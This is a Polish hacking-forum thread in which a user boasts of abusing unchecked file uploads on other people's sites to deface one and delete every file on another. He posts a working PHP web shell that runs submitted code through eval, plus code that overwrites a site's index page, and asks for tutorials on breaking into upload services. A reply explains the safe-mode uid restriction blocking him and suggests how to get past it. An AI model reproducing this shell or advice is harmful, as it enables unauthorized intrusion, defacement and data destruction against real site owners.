Upload

[marcio]

Witam w dzisiejszym dniu na pewnych forach znalazlem linki do 3 uploadow i wszystkie z nich mialy ten sa blad czyli nie sprawdzaly rozszerzenia i mozna bylo dac plik php wiec probowalem dac Owned na pierszym dalem rade na drugim dalem dare skasoac wszystkie katalogi i pliki jednak teraz mam problem osoba ktora miala upload gdzie skasowalem wszystkie pliki przeniosla go na inny server jednak blad dalej jest tylko ze nie mozna nic zrobic(przynajmniej ja nie umiem) w sensie takim ze dajac shell'a nic nie potrafie zrobic a dajac taki prosciutki kod

Kod php:

<?php
echo('<html>
<head><meta http-equiv="content-type" charset="utf-8" />
</head>
<body>
<form method="post" action="'.$_SERVER['PHP_SELF'].'"
<textarea name="code" rows="10" cols="50"></textarea>
<Br>
<input type="submit" name="wykonaj" value="Wykonaj"> <input type="submit" name="niszcz" value="Niszcz">
</form><body></html>');
if(isset($_POST['wykonaj'])) {
echo($_POST['code'].'<Br>');
$code = stripslashes($_POST['code']);
echo($code.'<Br>');
$a = eval($code);
echo($a);
}

if(isset($_POST['niszcz'])) unlink($_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']);
?>

I powiedzmy chce podmienic strone glowna lub kontakty.html bo na 100% wiem ze taka jest nazwa wiec robie:

Kod php:

$fp = fopen("../../../../index.php", "w");
fwrite($fp, "<h1>Owned :) pozdro</h1>");
fclose($fp); 


Dostaje blad: wiec zmieniam katalog na ten z bledy(napewno dobry) czyli taki
/home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html
i mam bledy

Kod php:

Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 48 is not allowed to access /home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html owned by uid 1247 in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 1

Warning: fopen(/home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html) [function.fopen]: failed to open stream: Success in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 1

Warning: fwrite(): supplied argument is not a valid stream resource in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 2

Warning: fclose(): supplied argument is not a valid stream resource in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 3 


Czyli jak widac zmieniajac hosting dana osoba nie wiedzac o tym uchronila sie bo na wczesniejszym takie rzeczy dzialaly co moge zrobic
Znacie jakies art/tutoriale/filmy etc jak sie wlamywac na upload?

[naichniach]

'friiiiiiiiiik'

[artii2]

nie wiem co tu jest niezrozumiale po samej tresci bledu jasno wynika o co chodzi

Kod:

Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 48 is not allowed to access /home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html owned by uid 1247 in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18)

problem polega na tym ze po pierwsze wlaczone jest safe mode ale glownym problemem jest uid pliku do ktorego chcesz miec dostep otoz plk ktory wrzucasz przez ten upload dostaje inny uid niz ten ktory ma plik kontakty.html chodzi o to ze jak zapewne wiesz w linuxie kazdy uzytkownik ma swoj uid (numer identyfikacyjny uzytkownika) i teraz tak w momencie gdy masz wlaczone safe mode serwer sprawdza czy uid wrzuconego pliku zgadza sie z tym do ktorego chcesz miec dostep a jak widac nie zgadza sie i dlatego wywala blad jak to rozwiazac? wrzucic plik przez ftp wtedy dostanie on odpowiednie uid mam nadzieje ze cos pomoglem
Pozdor